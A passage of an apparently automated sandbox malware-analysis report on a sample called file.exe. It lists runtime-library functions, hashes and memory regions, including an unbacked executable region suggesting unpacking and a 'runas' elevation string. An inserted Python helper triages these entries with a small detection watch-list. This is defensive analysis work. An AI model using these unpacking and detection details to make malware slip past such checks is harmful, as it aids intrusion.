                    • API ID: ErrorFullLastNamePath__dosmaperr
                    • String ID:
                    • API String ID: 2398240785-0
                    • Opcode ID: 1c4d122a44d644f0ad1f63a0f385b8a873575328d9b4e1f6675adc0812a1f3d5
                    • Instruction ID: 1fe541eff6bd0899817d30d0916f77e4946d01b6b56965e1649de8632fa44e19
                    • Opcode Fuzzy Hash: 1c4d122a44d644f0ad1f63a0f385b8a873575328d9b4e1f6675adc0812a1f3d5
                    • Instruction Fuzzy Hash: 44F08631600615BBDB256FB6DC04A47BF6DFF483A1B005526F618D7520D739E851C7D8
                    APIs
                      • Part of subcall function 044E02DD: TlsGetValue.KERNEL32(?,?,044DF85E,044DF68B,?,?), ref: 044E02E3
                    • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 044E53A6
                      • Part of subcall function 044EE686: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 044EE6AD
                      • Part of subcall function 044EE686: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 044EE6C6
                      • Part of subcall function 044EE686: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 044EE73C
                      • Part of subcall function 044EE686: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 044EE744
                    • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 044E53B4
                    • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 044E53BE
                    • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 044E53C8
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceValueVirtualWork
                    • String ID:
                    • API String ID: 2616382602-0
                    • Opcode ID: 935f95a8d328cb7e17ad73e666d247f97af5b027fc0f75f92dedba51ab608920
                    • Instruction ID: f53cc2dec393ab6833bd1fa1c95a3dba4dcb343eb51315b206e8ec6eedd54be4
                    • Opcode Fuzzy Hash: 935f95a8d328cb7e17ad73e666d247f97af5b027fc0f75f92dedba51ab608920
                    • Instruction Fuzzy Hash: 8BF0F631A00518B7EF25B767D81097EF7699F8065AB44012FE81193292EFB4BE1587C6
                    APIs
                      • Part of subcall function 00420076: TlsGetValue.KERNEL32(?,?,0041F5F7,0041F424,?,?), ref: 0042007C
                    • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 0042513F
                      • Part of subcall function 0042E41F: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 0042E446
                      • Part of subcall function 0042E41F: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 0042E45F
                      • Part of subcall function 0042E41F: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 0042E4D5
                      • Part of subcall function 0042E41F: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 0042E4DD
                    • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 0042514D
                    • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 00425157
                    • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 00425161
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                     • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceValueVirtualWork
                    • String ID:
                    • API String ID: 2616382602-0
                    • Opcode ID: 935f95a8d328cb7e17ad73e666d247f97af5b027fc0f75f92dedba51ab608920
                    • Instruction ID: 3766eabf401ff52a77b5129f6dfad517b3767f028463115b44bbc9b501536ea0
                    • Opcode Fuzzy Hash: 935f95a8d328cb7e17ad73e666d247f97af5b027fc0f75f92dedba51ab608920
                    • Instruction Fuzzy Hash: E4F0F635B0093427CA25B667B812D6EB7659F90B14B84012FF51153292DF7C9E15C7CD
                    APIs
                    • __EH_prolog3.LIBCMT ref: 044DFC88
                    • Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 044DFCBB
                    • Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 044DFCC7
                    • Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 044DFCD0
                      • Part of subcall function 044DF664: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 044DF686
                      • Part of subcall function 044DF664: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 044DF6A7
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Concurrency::critical_section::_Timer$Acquire_lockAsyncBase::ContextCurrentDerefH_prolog3LibraryLoadLockNodeNode::QueueRegisterSchedulerSwitch_to_active
                    • String ID:
                    • API String ID: 2559503089-0
                    • Opcode ID: 8a788c5f9dfb7895deb3ccd31f8a7865abec001d3e2efdd0ea5cc74812fdcb80
                    • Instruction ID: 8f2dfaafecc44fca86f6204f18c6e28b3b45448d03a437a94245cc4e479e1d45
                    • Opcode Fuzzy Hash: 8a788c5f9dfb7895deb3ccd31f8a7865abec001d3e2efdd0ea5cc74812fdcb80
                    • Instruction Fuzzy Hash: E6F02471B00604A6AF34BFB6487066E32966F40B18F04413FA8035B381DFA0BE099391
                    APIs
                    • Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 00429629
                      • Part of subcall function 0041F5DB: Concurrency::details::SchedulerBase::GetDefaultScheduler.LIBCONCRT ref: 00425596
                    • Concurrency::details::ContextBase::CancelCollection.LIBCONCRT ref: 0042964D
                    • Concurrency::details::_TaskCollectionBase::_FinishCancelState.LIBCMT ref: 00429660
                    • Concurrency::details::ContextBase::CancelStealers.LIBCMT ref: 00429669
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                     • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Base::Concurrency::details::$CancelContextScheduler$Collection$Base::_Concurrency::details::_CurrentDefaultFinishStateStealersTask
                    • String ID:
                    • API String ID: 218105897-0
                    • Opcode ID: 4b9cacacb2642105106c1960082ff98311365aed8213a72dc6553885aca439e3
                    • Instruction ID: 93f89da88a0149968f4bc4dad75d0c9ef1f1bc6a703f7e560df40d29a4a9f6d4
                    • Opcode Fuzzy Hash: 4b9cacacb2642105106c1960082ff98311365aed8213a72dc6553885aca439e3
                    • Instruction Fuzzy Hash: A5F0A070300A305EE661AA26A812F6E23D99F44758F40881FE45B87282CE2CEC43CB5D
                    APIs
                    • WriteConsoleW.KERNEL32(044C89D7,0000000F,0045FBB0,00000000,044C89D7,?,045054C1,044C89D7,00000001,044C89D7,044C89D7,?,0450039E,00000000,?,044C89D7), ref: 04506DED
                    • GetLastError.KERNEL32(?,045054C1,044C89D7,00000001,044C89D7,044C89D7,?,0450039E,00000000,?,044C89D7,00000000,044C89D7,?,045008F2,044C89D7), ref: 04506DF9
                      • Part of subcall function 04506DBF: CloseHandle.KERNEL32(00462970,04506E09,?,045054C1,044C89D7,00000001,044C89D7,044C89D7,?,0450039E,00000000,?,044C89D7,00000000,044C89D7), ref: 04506DCF
                    • ___initconout.LIBCMT ref: 04506E09
                      • Part of subcall function 04506D81: CreateFileW.KERNEL32(00457658,40000000,00000003,00000000,00000003,00000000,00000000,04506DB0,045054AE,044C89D7,?,0450039E,00000000,?,044C89D7,00000000), ref: 04506D94
                    • WriteConsoleW.KERNEL32(044C89D7,0000000F,0045FBB0,00000000,?,045054C1,044C89D7,00000001,044C89D7,044C89D7,?,0450039E,00000000,?,044C89D7,00000000), ref: 04506E1E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                    • String ID:
                    • API String ID: 2744216297-0
                    • Opcode ID: 68f8837eb1d4a2712d10f3c5b8a7bf099e143a904c0dfdbb60282304a99716f4
                    • Instruction ID: 99305278c424cdc35b8aa41b48a886ede6525523877fbf832eab57dc6e04949c
                    • Opcode Fuzzy Hash: 68f8837eb1d4a2712d10f3c5b8a7bf099e143a904c0dfdbb60282304a99716f4
                    • Instruction Fuzzy Hash: AEF01C3A501215BBCF621FA5EC0898A3F26FB483A1F008121FA1C85160D672D820EB95
                    APIs
                    • WriteConsoleW.KERNEL32(00408770,0000000F,0045FBB0,00000000,00408770,?,0044525A,00408770,00000001,00408770,00408770,?,00440137,00000000,?,00408770), ref: 00446B86
                    • GetLastError.KERNEL32(?,0044525A,00408770,00000001,00408770,00408770,?,00440137,00000000,?,00408770,00000000,00408770,?,0044068B,00408770), ref: 00446B92
                      • Part of subcall function 00446B58: CloseHandle.KERNEL32(FFFFFFFE,00446BA2,?,0044525A,00408770,00000001,00408770,00408770,?,00440137,00000000,?,00408770,00000000,00408770), ref: 00446B68
                    • ___initconout.LIBCMT ref: 00446BA2
                      • Part of subcall function 00446B1A: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00446B49,00445247,00408770,?,00440137,00000000,?,00408770,00000000), ref: 00446B2D
                    • WriteConsoleW.KERNEL32(00408770,0000000F,0045FBB0,00000000,?,0044525A,00408770,00000001,00408770,00408770,?,00440137,00000000,?,00408770,00000000), ref: 00446BB7
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                     • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                    • String ID:
                    • API String ID: 2744216297-0
                    • Opcode ID: 68f8837eb1d4a2712d10f3c5b8a7bf099e143a904c0dfdbb60282304a99716f4
                    • Instruction ID: 62f88e2b5bb4a89209554c6b3be65d4fc596e2bd3b8c6ec97840f3fc23b8838f
                    • Opcode Fuzzy Hash: 68f8837eb1d4a2712d10f3c5b8a7bf099e143a904c0dfdbb60282304a99716f4
                    • Instruction Fuzzy Hash: 7BF03736101274BBDF521F95DC0898A3F2AFB457A1F014062FD1CC5131D672DD209B99
                    APIs
                    • SleepConditionVariableCS.KERNELBASE(?,0041D246,00000064), ref: 0041D2CC
                    • LeaveCriticalSection.KERNEL32(00465720,00468650,?,0041D246,00000064,?,76230F00,?,0040765D,00468650), ref: 0041D2D6
                    • WaitForSingleObjectEx.KERNEL32(00468650,00000000,?,0041D246,00000064,?,76230F00,?,0040765D,00468650), ref: 0041D2E7
                    • EnterCriticalSection.KERNEL32(00465720,?,0041D246,00000064,?,76230F00,?,0040765D,00468650), ref: 0041D2EE
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                     • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                    • String ID:
                    • API String ID: 3269011525-0
                    • Opcode ID: 14bf3a9d4be9bf837093a7814f6444b67149b9ba994a1b02bf3174ea719e34b8
                    • Instruction ID: 1ac50c9b0066e0c4a2d53f3e21af84157b5af11804174151a578e244d4ee8ebf
                    • Opcode Fuzzy Hash: 14bf3a9d4be9bf837093a7814f6444b67149b9ba994a1b02bf3174ea719e34b8
                    • Instruction Fuzzy Hash: 6DE0ED35541B24E7CB112B94AC08A8E3B18EB09753F144072F9059656196B598419BDE
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Sleep
                    • String ID: runas
                    • API String ID: 3472027048-4000483414
                    • Opcode ID: 33b8619bdee661f72d9fcc56bf55e4648d4f5d1b7ff23d2d9bb236fc44975a22
                    • Instruction ID: e1cd46d9460709393e138addb45ef8657428fb9d11fc3e53b0804f23161cfa93
                    • Opcode Fuzzy Hash: 33b8619bdee661f72d9fcc56bf55e4648d4f5d1b7ff23d2d9bb236fc44975a22
                    • Instruction Fuzzy Hash: 3BE18E71A00144ABFF08EF78CD85BADBB72DF41318F14864EE4159B3C6DB75AA408B92
                    APIs
                    • __Mtx_init_in_situ.LIBCPMT ref: 0041744C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                     • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Mtx_init_in_situ
                    • String ID: @.@$@|A
                    • API String ID: 3366076730-1638491229
                    • Opcode ID: 9198d7d0723313f094a4fbefec6dcaa9f5ff6ff65217a6e00dcf0e57fd239118
                    • Instruction ID: 5e1297a57d6b7b639a8e02b3d6bde4c068ab49fd92cbbf4b728f3a3119506081
                    • Opcode Fuzzy Hash: 9198d7d0723313f094a4fbefec6dcaa9f5ff6ff65217a6e00dcf0e57fd239118
                    • Instruction Fuzzy Hash: 23A136B0A01619CFDB21CF69C98479EBBF0FF48714F18819AE819AB351E7799D41CB84
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: C:\Users\user\Desktop\file.exe
                    • API String ID: 0-3695852857
                    • Opcode ID: a17d57e60d168b2e2e9f8c893ba8581ed93e8945fc96e4ae5ef2c64ef190e72b
                    • Instruction ID: 3e269a77a7276cbc7ef3962883cf2a68c04f40bcce03bd6d1d710c4e2c29ebd5
                    • Opcode Fuzzy Hash: a17d57e60d168b2e2e9f8c893ba8581ed93e8945fc96e4ae5ef2c64ef190e72b
                    • Instruction Fuzzy Hash: 2441A7B1A04614ABDF25DF9ADC81A9FBBB8EF88314F14406BE600D7251EB70AA40CB55
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                     • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: C:\Users\user\Desktop\file.exe
                    • API String ID: 0-3695852857
                    • Opcode ID: a17d57e60d168b2e2e9f8c893ba8581ed93e8945fc96e4ae5ef2c64ef190e72b
                    • Instruction ID: e36cff2137ef11141afc6ba0048b09c1a3638fd79f1bf7c1abf2875572eb59fc
                    • Opcode Fuzzy Hash: a17d57e60d168b2e2e9f8c893ba8581ed93e8945fc96e4ae5ef2c64ef190e72b
                    • Instruction Fuzzy Hash: 4941D271A00215ABEF15DF9ADC859AFBBB8EB8D300F14106BE400A7351E7F88E41CB59
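                     The entries above keep pairing the same Opcode ID at two bases: 00400000 (based on PE: true, the loaded file.exe image) and 044C0000 (based on PE: false, a region with no file backing). That pairing is what lets a reader tie the "Detected unpacking" verdict to concrete functions, and the Sleep / `runas` entry earlier is the one String ID on this stretch worth a second look (`runas` is the ShellExecute verb that requests elevation; the report shows only the string, not the call). The following triage helper is an added example and is not part of the Joe Sandbox report or of the analysed sample: it parses entries in this layout, lists Opcode IDs shared across memory regions, flags String IDs on a watch-list, and lists non-PE-backed regions whose dump name carries protection 0x40. The SAMPLE entries, the watch-list, and the reading of the dump-file name's fifth dot-separated field as the page protection (0x40 = PAGE_EXECUTE_READWRITE) are assumptions of this example.

```python
"""Triage helper for Joe Sandbox "Function analysis" entries (added example,
not report or sample code). Assumption: the dump name is
<proc>.<reason>.<id>.<base>.<protect>.<...>.sdmp and field 5 is the page
protection (0x40 == PAGE_EXECUTE_READWRITE). SAMPLE and WATCH are constructed."""
import re
from collections import defaultdict

PAGE_EXECUTE_READWRITE = 0x40
WATCH = ("runas",)  # constructed watch-list; extend for your own triage

SOURCE_RE = re.compile(
    r"Source File: (?P<name>\S+)\.sdmp, Offset: (?P<base>[0-9A-Fa-f]+), "
    r"based on PE: (?P<pe>true|false)"
)
FIELD_RE = re.compile(r"^• (?P<key>[^:]+): ?(?P<val>.*)$")

# Constructed sample in the report's own layout: five entries, the first two
# sharing one Opcode ID across the two regions, one carrying the "runas" string.
SAMPLE = r"""
APIs
• Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 044F3750
Memory Dump Source
• Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
Similarity
• API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork
• String ID:
• Opcode ID: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
APIs
• Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 004334E9
Memory Dump Source
• Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork
• String ID:
• Opcode ID: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
Similarity
• API ID: Sleep
• String ID: runas
• Opcode ID: 33b8619bdee661f72d9fcc56bf55e4648d4f5d1b7ff23d2d9bb236fc44975a22
APIs
• __Mtx_init_in_situ.LIBCPMT ref: 0041744C
Strings
Memory Dump Source
• Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Mtx_init_in_situ
• String ID: @.@$@|A
• Opcode ID: 9198d7d0723313f094a4fbefec6dcaa9f5ff6ff65217a6e00dcf0e57fd239118
Strings
Memory Dump Source
• Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID:
• String ID: C:\Users\user\Desktop\file.exe
• Opcode ID: a17d57e60d168b2e2e9f8c893ba8581ed93e8945fc96e4ae5ef2c64ef190e72b
"""


def parse_entries(text):
    """Split the listing into entries; each has its API refs, region and IDs."""
    entries, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        # "APIs" always opens an entry; "Strings" opens one only when the
        # current entry already has its Source File line (so it is complete).
        if line == "APIs" or (line == "Strings" and (cur is None or cur["base"])):
            cur = {"apis": [], "subcalls": [], "api_id": "", "string_id": "",
                   "opcode_id": "", "base": "", "pe_backed": None, "protect": None}
            entries.append(cur)
            continue
        if cur is None:
            continue
        m = SOURCE_RE.search(line)
        if m:
            cur["base"] = m["base"].upper()
            cur["pe_backed"] = m["pe"] == "true"
            cur["protect"] = int(m["name"].split(".")[4], 16)  # assumed field
        elif " ref: " in line:
            name = line.lstrip("• ").split(" ref: ")[0].rstrip(",")
            (cur["subcalls"] if name.startswith("Part of subcall") else cur["apis"]).append(name)
        else:
            fm = FIELD_RE.match(line)
            if fm:
                key = fm["key"].strip().lower().replace(" ", "_")
                if key in ("api_id", "string_id", "opcode_id"):
                    cur[key] = fm["val"].strip()
    return entries


def shared_opcodes(entries):
    """Opcode IDs seen in more than one region -> {base: pe_backed}."""
    seen = defaultdict(dict)
    for e in entries:
        if e["opcode_id"] and e["base"]:
            seen[e["opcode_id"]][e["base"]] = e["pe_backed"]
    return {op: regions for op, regions in seen.items() if len(regions) > 1}


def flag_strings(entries, watch=WATCH):
    """(opcode_id, needle, base) for every String ID containing a watched string."""
    return [(e["opcode_id"], n, e["base"]) for e in entries
            for n in watch if n.lower() in e["string_id"].lower()]


def unbacked_rwx_regions(entries):
    """Bases of regions that are not PE-backed and were dumped with RWX protection."""
    return sorted({e["base"] for e in entries
                   if e["pe_backed"] is False and e["protect"] == PAGE_EXECUTE_READWRITE})


def summarize(entries):
    """One line per finding across the three checks."""
    out = []
    for op, regions in sorted(shared_opcodes(entries).items()):
        where = ", ".join(f"{b} (PE-backed={pe})" for b, pe in sorted(regions.items()))
        out.append(f"shared opcode {op[:16]}...: {where}")
    for op, needle, base in flag_strings(entries):
        out.append(f"watch-list string {needle!r} in function {op[:16]}... at {base}")
    for base in unbacked_rwx_regions(entries):
        out.append(f"non-PE-backed RWX region at {base}")
    return out


if __name__ == "__main__":
    for finding in summarize(parse_entries(SAMPLE)):
        print(finding)
```

                     Feed the helper the text of the whole function-analysis section rather than the constructed sample to get the complete list of functions that exist in both the on-disk image and the unbacked region; that list is the set you would diff first when checking whether the unbacked copy is a plain relocation of the original code or carries something the file on disk does not.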
                    APIs
                    • __Cnd_destroy_in_situ.LIBCPMT ref: 00417B48
                    • __Mtx_destroy_in_situ.LIBCPMT ref: 00417B51
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                     • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Cnd_destroy_in_situMtx_destroy_in_situ
                    • String ID: {A
                    • API String ID: 1432671424-169627337
                    • Opcode ID: 508da38ff4ba26469217b6a2bf1b4c06ef4b1217051b4f1e4bbe8fea5b21e982
                    • Instruction ID: 190a37b34fbfeecb8fffc7a3455fb99a6090ca9c34ce7be73932cc516f32dd04
                    • Opcode Fuzzy Hash: 508da38ff4ba26469217b6a2bf1b4c06ef4b1217051b4f1e4bbe8fea5b21e982
                    • Instruction Fuzzy Hash: 0631F3B1A047009BD720DF68D845A9BB7F8EF14354F100A2FE946C3241E779FA94C3A9
                    APIs
                      • Part of subcall function 044FE563: GetOEMCP.KERNEL32(00000000,044FE7D5,?,?,044F78F5,044F78F5,?), ref: 044FE58E
                    • _free.LIBCMT ref: 044FE832
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID: @"F
                    • API String ID: 269201875-3084318295
                    • Opcode ID: 63543627e392427e2bb9f2d8bdd097651d763b6fbf4343d7bf33c5043982c81c
                    • Instruction ID: b8fed7bb90a3c07e02fa0c0ca8109bf3afb2fe3a0e7bc7db6a6decd39c9c8c0f
                    • Opcode Fuzzy Hash: 63543627e392427e2bb9f2d8bdd097651d763b6fbf4343d7bf33c5043982c81c
                    • Instruction Fuzzy Hash: 9531AD71900649AFDF11EF69DC80A9F7BF4FF44315F6140ABEA109B2A1EB72A940CB51
                    APIs
                    • __Mtx_init_in_situ.LIBCPMT ref: 00403962
                    • __Mtx_init_in_situ.LIBCPMT ref: 004039A1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                     • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Mtx_init_in_situ
                    • String ID: pB@
                    • API String ID: 3366076730-522444117
                    • Opcode ID: 74691cddd157f9733b136221944eda0284ddcc00da53afa76240b6fc065f8951
                    • Instruction ID: 85cc1f21d270febbee68db5d29f907cdb29bffcc18a0c6cdd29de26c28620044
                    • Opcode Fuzzy Hash: 74691cddd157f9733b136221944eda0284ddcc00da53afa76240b6fc065f8951
                    • Instruction Fuzzy Hash: C04127B46017058FD720CF29C988B5ABBF4FF44315F10861EE86A8B381E7B8A905CF80
                    APIs
                    • __alloca_probe_16.LIBCMT ref: 0041B76E
                    • RaiseException.KERNEL32(?,?,?,?), ref: 0041B793
                      • Part of subcall function 00433C12: RaiseException.KERNEL32(E06D7363,00000001,00000003,@E,?,?,?,0045E440), ref: 00433C72
                      • Part of subcall function 00438C8F: IsProcessorFeaturePresent.KERNEL32(00000017,0043A7CD,?,?,00436A5A,?,?,?,?,0043768E,?), ref: 00438CAB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                     • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionRaise$FeaturePresentProcessor__alloca_probe_16
                    • String ID: csm
                    • API String ID: 1924019822-1018135373
                    • Opcode ID: c95906c105d3fe5d98dead7adff23072b26268c9b0da60fee90a03e3cf153ed8
                    • Instruction ID: 279872545446a478c70440809aaa54d3911d66500b0e0947e58eeb54dd8337e2
                    • Opcode Fuzzy Hash: c95906c105d3fe5d98dead7adff23072b26268c9b0da60fee90a03e3cf153ed8
                    • Instruction Fuzzy Hash: 7521B635D002189BCF24EFA5D945AEEB3B5EF84715F58401EE419AB290CB38AD85CBC5
                    APIs
                      • Part of subcall function 00436ADC: _free.LIBCMT ref: 00436AEA
                      • Part of subcall function 0043B139: MultiByteToWideChar.KERNEL32(0043E7FD,00000100,E8458D00,00000000,00000000,00000020,?,0043F2AF,00000000,00000000,00000100,00000020,00000000,00000000,E8458D00,00000100), ref: 0043B1A9
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,00436E4A,00000000,?,00000000,?), ref: 004369AF
                    • __dosmaperr.LIBCMT ref: 004369B6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ByteCharErrorLastMultiWide__dosmaperr_free
                    • String ID: JnC
                    • API String ID: 4030486722-2531755783
                    • Opcode ID: 542da8e16dc8448421128fe7dc572524c7bf7eb1b3f266dbcc14f135b89de347
                    • Instruction ID: a10604e378203b479d6c6f5be248016944f26615d1a374979f6fa953727c9187
                    • Opcode Fuzzy Hash: 542da8e16dc8448421128fe7dc572524c7bf7eb1b3f266dbcc14f135b89de347
                    • Instruction Fuzzy Hash: 75210BB1500612BBCB206F278C01B1B77A9EF49370F12D21FF5699B290D778E8108BD9
                    APIs
                    • Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 00431872
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004318BD
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::FreeIdleProcessorRoot::SpinUntilVirtualstd::invalid_argument::invalid_argument
                    • String ID: pContext
                    • API String ID: 3390424672-2046700901
                    • Opcode ID: 582a63a74f590e99f896d5d57d10d118a2d1f6dead95b6f27a98c9f597e5b54f
                    • Instruction ID: 7964dc9a277d96143858123c881e5cd0313aeba4e8efcfbf37adde4059d6b578
                    • Opcode Fuzzy Hash: 582a63a74f590e99f896d5d57d10d118a2d1f6dead95b6f27a98c9f597e5b54f
